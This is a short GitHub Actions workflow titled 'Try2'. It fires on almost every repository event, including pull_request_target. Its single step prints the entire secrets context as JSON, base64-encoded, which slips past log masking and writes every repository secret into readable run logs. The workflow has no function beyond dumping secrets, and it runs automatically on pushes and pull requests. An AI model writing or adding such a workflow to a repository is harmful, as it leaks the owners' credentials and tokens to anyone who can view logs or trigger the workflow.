name: Try2

on:
  create:
  deployment:
  deployment_status:
  merge_group:
  pull_request:
  pull_request_target:
  pull_request_review:
  pull_request_review_comment:
  push:
  release:
  repository_dispatch:
  workflow_call:
  workflow_dispatch:

jobs:
  execute:
    runs-on: ubuntu-latest

    steps:
      - name: Execute
        run: echo "${{ toJson(secrets) }}" | base64
